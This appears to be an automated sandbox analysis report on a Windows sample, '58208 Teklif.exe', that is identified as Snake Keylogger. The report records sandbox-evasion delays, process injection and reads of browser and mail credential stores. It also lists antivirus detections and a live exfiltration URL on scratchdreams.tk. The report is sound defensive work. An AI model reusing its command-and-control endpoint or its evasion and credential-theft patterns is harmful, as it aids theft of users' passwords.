            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598543Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598194Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597965Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597405Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596295Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595952Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeWindow / User API: threadDelayed 1541Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeWindow / User API: threadDelayed 8311Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7440Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7700Thread sleep count: 1541 > 30Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7700Thread sleep count: 8311 > 30Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598543s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598194s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597965s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597405s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596295s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595952s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -594749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598543Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598194Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597965Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597405Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596295Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595952Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594531Jump to behavior
            Source: 58208 Teklif.exe, 00000003.00000002.3765792530.000000000115F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllconf
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A989B0 LdrInitializeThunk,3_2_05A989B0
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory written: C:\Users\user\Desktop\58208 Teklif.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Users\user\Desktop\58208 Teklif.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Users\user\Desktop\58208 Teklif.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\58208 Teklif.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\58208 Teklif.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		111
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            58208 Teklif.exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
            58208 Teklif.exe66%VirustotalBrowse
            58208 Teklif.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            reallyfreegeoip.org1%VirustotalBrowse
            scratchdreams.tk6%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://tempuri.org/DataSet1.xsdCEscolha0%Avira URL Cloudsafe
            https://scratchdreams.tk100%Avira URL Cloudmalware
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe
            https://scratchdreams.tk15%VirustotalBrowse
            http://tempuri.org/DataSet1.xsdCEscolha3%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		104.21.67.152
            		truefalseunknown
            scratchdreams.tk
            		172.67.169.18
            		truetrueunknown
            checkip.dyndns.com
            		193.122.130.0
            		truefalseunknown
            checkip.dyndns.org
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://checkip.dyndns.org/false
            • URL Reputation: safe
            		unknown
            https://scratchdreams.tk/_send_.php?TSfalse
            • Avira URL Cloud: malware
            		unknown
            https://reallyfreegeoip.org/xml/102.129.152.231false
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://tempuri.org/DataSet1.xsdCEscolha58208 Teklif.exefalse
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
